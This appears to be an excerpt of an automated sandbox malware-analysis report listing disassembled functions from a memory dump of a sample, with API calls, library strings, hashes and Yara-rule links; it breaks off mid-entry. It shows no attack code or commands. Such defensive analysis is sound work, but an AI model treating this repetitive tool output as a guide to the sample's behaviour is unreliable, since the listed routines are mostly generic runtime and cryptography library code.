Opcode ID: 7a87ef016efc61b19ed210d68aec8059e340fb5aa4dac2428cde81dfa470d5f3
Instruction ID: 11c5890ef708586163ad24d4650f49ccd601aa74a1278c62d81d0d155dda5815
Opcode Fuzzy Hash: 7a87ef016efc61b19ed210d68aec8059e340fb5aa4dac2428cde81dfa470d5f3
Instruction Fuzzy Hash: 7E313C70B01A189FCB10CFA9CC84B9DB7BDAF95604F20869AE418E7651C771D9808F50

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FFD9F Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 05a2ada74095ab040be6743eb3694dbfee0c4ffd78d5908b223deebb7eb5f72f
Instruction ID: a9d5864b1a0605dfc8a50d9165ccf19fe63f69bb7efe0cc32f6f0aeaff30f4b5
Opcode Fuzzy Hash: 05a2ada74095ab040be6743eb3694dbfee0c4ffd78d5908b223deebb7eb5f72f
Instruction Fuzzy Hash: 793149B0F01A189FCB10DBA9CD84B9DB7BEAF99204F20858AE418E7641C771E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C909011 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 980f8cebf934f069ee293e39cbaebeebcecc3f0c306f893a10eada336cd17782
Instruction ID: ddc3c788455636d61582faa88f36453779f9897693134f017e55771030926329
Opcode Fuzzy Hash: 980f8cebf934f069ee293e39cbaebeebcecc3f0c306f893a10eada336cd17782
Instruction Fuzzy Hash: 86314C70F016189FCB10DBA9CD80B9EB7BDAF99204F24868AE419E7641CB71ED81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C95249C Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000100,?,?,?,?,?,6C9525B1,?,00000000,?), ref: 6C9524E6
_malloc.LIBCMT ref: 6C95251B
_memset.LIBCMT ref: 6C95253B
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000,00000001,00000000), ref: 6C952550
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6C95255E
__freea.LIBCMT ref: 6C952568

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ByteCharMultiWide$StringType__freea_malloc_memset
String ID:
API String ID: 525495869-0
Opcode ID: b7e47ec3c2aae8a83fbcb283b1315a83799f72b203480fe095bb8a2da14b3ea9
Instruction ID: 18ea43f2ea2a37c466a67dfd53512554517539cbd61209c17b4b781da98b435f
Opcode Fuzzy Hash: b7e47ec3c2aae8a83fbcb283b1315a83799f72b203480fe095bb8a2da14b3ea9
Instruction Fuzzy Hash: D831CCB160020AAFEF00CFA8DC94DAF7BADEB18358F61442AF914D7650E730DD658B60

Uniqueness

Uniqueness Score: -1.00%

Function 6C908A39 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6C9069C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6C906A08
Part of subcall function 6C9069C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C906A15
Part of subcall function 6C9069C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6C906A41

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 8a323f663b117db2a2d67cc7e847f533bb79bdbb33cc5bc831dcbfab24e8ed93
Instruction ID: 2437e32e6e54020a1f56565ede0933700677d959c1410fb82739297974dbcfc0
Opcode Fuzzy Hash: 8a323f663b117db2a2d67cc7e847f533bb79bdbb33cc5bc831dcbfab24e8ed93
Instruction Fuzzy Hash: 90312971F016189FCB10CB68CC80B9EB7BAAF99214F24468AE419E7641CB75E9808F50

Uniqueness

Uniqueness Score: -1.00%

Function 6C9087EE Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6C9069C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6C906A08
Part of subcall function 6C9069C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C906A15
Part of subcall function 6C9069C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6C906A41

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 6c3eeacde2ac92d0b2ceed652d3d364fda7d308a09db765daf33f1029a61cce0
Instruction ID: b3092966ebcd351cab35a103ca0ee14465a62f5e25ac13624a2fb6514eff4d71
Opcode Fuzzy Hash: 6c3eeacde2ac92d0b2ceed652d3d364fda7d308a09db765daf33f1029a61cce0
Instruction Fuzzy Hash: 89312871F016189FCB10DBA9CC80B9EB7BEAF95204F20868AE419E7641DB75ED80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FFD3E Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6C9069C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6C906A08
Part of subcall function 6C9069C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C906A15
Part of subcall function 6C9069C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6C906A41

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 6c3eeacde2ac92d0b2ceed652d3d364fda7d308a09db765daf33f1029a61cce0
Instruction ID: 838f4f1001c540be9ff9c12b460ea874d8ec83581b2f02fa30f480ae87cbdc96
Opcode Fuzzy Hash: 6c3eeacde2ac92d0b2ceed652d3d364fda7d308a09db765daf33f1029a61cce0
Instruction Fuzzy Hash: 843149B0E01A189FCB10DBA9CD84B9DB7BEAF95704F20858AE518E7641CB71D980CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FFF89 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6C9069C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6C906A08
Part of subcall function 6C9069C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C906A15
Part of subcall function 6C9069C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6C906A41

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 8a323f663b117db2a2d67cc7e847f533bb79bdbb33cc5bc831dcbfab24e8ed93
Instruction ID: b8785ed7fbff1d08d854b4a4a154c1a0e2d49cf37ef19e777d2b975645496451
Opcode Fuzzy Hash: 8a323f663b117db2a2d67cc7e847f533bb79bdbb33cc5bc831dcbfab24e8ed93
Instruction Fuzzy Hash: 97314BB0F01A189FCB14CB69CC84B9DB7BEAF95704F20468AE418E7A41C771D9808F50

Uniqueness

Uniqueness Score: -1.00%

Function 6C9406A0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 6C8E4760: __CxxThrowException@8.LIBCMT ref: 6C8E47F9

_memmove.LIBCMT ref: 6C940907
_memmove.LIBCMT ref: 6C940936
_memmove.LIBCMT ref: 6C940959
__CxxThrowException@8.LIBCMT ref: 6C940A25

Strings

PSSR_MEM: message recovery disabled, xrefs: 6C9409E3

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _memmove$Exception@8Throw
String ID: PSSR_MEM: message recovery disabled
API String ID: 2655171816-3051149714
Opcode ID: 4d2dd24b35433db477555b210524e6ea650190e00e3e13c8db4ac1a10ea7453f
Instruction ID: 002018b10a001d1e93c9b0eda581c272cd0ac895fd58787a167920c7f715d67d
Opcode Fuzzy Hash: 4d2dd24b35433db477555b210524e6ea650190e00e3e13c8db4ac1a10ea7453f
Instruction Fuzzy Hash: 0FC178742083819FD714CF28C980B6BBBE5BFD9304F148A5DE5898B781DB35E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C947FE0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 325COMMON

Download Yara Rule

APIs

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E402A

__CxxThrowException@8.LIBCMT ref: 6C9480EA

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

Strings

invalid bit length, xrefs: 6C948044
Min, xrefs: 6C9483C5
RandomNumberType, xrefs: 6C9483A9
Max, xrefs: 6C9483E3

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: Max$Min$RandomNumberType$invalid bit length
API String ID: 3718517217-2498579642
Opcode ID: ab41ae792bdc4629a2d1ed956c18e7cd42ec47e486f44b30754fa0424f6f1ddd
Instruction ID: af530ce02c0cb9b4248436866b2114cca72ff08b5f0cb915e5461093539086ff
Opcode Fuzzy Hash: ab41ae792bdc4629a2d1ed956c18e7cd42ec47e486f44b30754fa0424f6f1ddd
Instruction Fuzzy Hash: 37C1A07450D7809AE328CB68C850B9FB7E5AFE9314F444A1DE58983B91DB34D908C7A7

Uniqueness

Uniqueness Score: -1.00%

Function 6C94BE8E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6C94BEB6

Part of subcall function 6C94AB70: __getptd.LIBCMT ref: 6C94AB7E
Part of subcall function 6C94AB70: __getptd.LIBCMT ref: 6C94AB8C

__getptd.LIBCMT ref: 6C94BEC0

Part of subcall function 6C94EAE6: __getptd_noexit.LIBCMT ref: 6C94EAE9
Part of subcall function 6C94EAE6: __amsg_exit.LIBCMT ref: 6C94EAF6

__getptd.LIBCMT ref: 6C94BECE
__getptd.LIBCMT ref: 6C94BEDC
__getptd.LIBCMT ref: 6C94BEE7
_CallCatchBlock2.LIBCMT ref: 6C94BF0D

Part of subcall function 6C94AC15: __CallSettingFrame@12.LIBCMT ref: 6C94AC61

Part of subcall function 6C94BFB4: __getptd.LIBCMT ref: 6C94BFC3
Part of subcall function 6C94BFB4: __getptd.LIBCMT ref: 6C94BFD1

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: f65cd3f13855bcd91205ab0597b26c34b990c5014031dc1ac8c5592a180d9659
Instruction ID: 6b3d3520a9afbeb05b039121a317c7cc70ed1d5d7773f2007b68b56933ce5c37
Opcode Fuzzy Hash: f65cd3f13855bcd91205ab0597b26c34b990c5014031dc1ac8c5592a180d9659
Instruction Fuzzy Hash: 3911F3B1C002099FDB10DFA8C544AEEBBB0FF28318F148469F814A7750EB38DA189F90

Uniqueness

Uniqueness Score: -1.00%

Function 6C9170E0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 187COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6C917267

Strings

: IV length , xrefs: 6C91719E, 6C9172D7
is less than the minimum of , xrefs: 6C9171D0
exceeds the maximum of , xrefs: 6C917309

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8Throw
String ID: exceeds the maximum of $ is less than the minimum of $: IV length
API String ID: 2005118841-1273958906
Opcode ID: 8e2f0d9d4d68fbb4244ef0d58a9214df7a9a4d76fda68308c8592680834a96da
Instruction ID: 91945e37f9b53c004250d42e62b325a6fb5213757156f1663dc0cc26f59b8583
Opcode Fuzzy Hash: 8e2f0d9d4d68fbb4244ef0d58a9214df7a9a4d76fda68308c8592680834a96da
Instruction Fuzzy Hash: 246170711083819FD331DB68C984FDBB7E8AFE9344F004A1DE59D87741DB75A9488BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C93AE90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6C93AF27
_strncmp.LIBCMT ref: 6C93AFA6

Strings

ValueNames, xrefs: 6C93AEB7
ThisPointer:, xrefs: 6C93AF4B, 6C93AFA0

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: 3446b4fce3f5c154495be77f51e93f184be094d174abc8332f11017956762e06
Instruction ID: 6f92b4a967fbf36bfc16b218aead92baf88d087733980759389abe2551e8c36a
Opcode Fuzzy Hash: 3446b4fce3f5c154495be77f51e93f184be094d174abc8332f11017956762e06
Instruction Fuzzy Hash: 0051D7712087405BC724CFA9C890E67B7FE9F9634CF085A5DE4DA87B91DB22E809C761

Uniqueness

Uniqueness Score: -1.00%

Function 6C91A360 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6C91A3F7
_strncmp.LIBCMT ref: 6C91A476

Strings

ValueNames, xrefs: 6C91A387
ThisPointer:, xrefs: 6C91A41B, 6C91A470

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
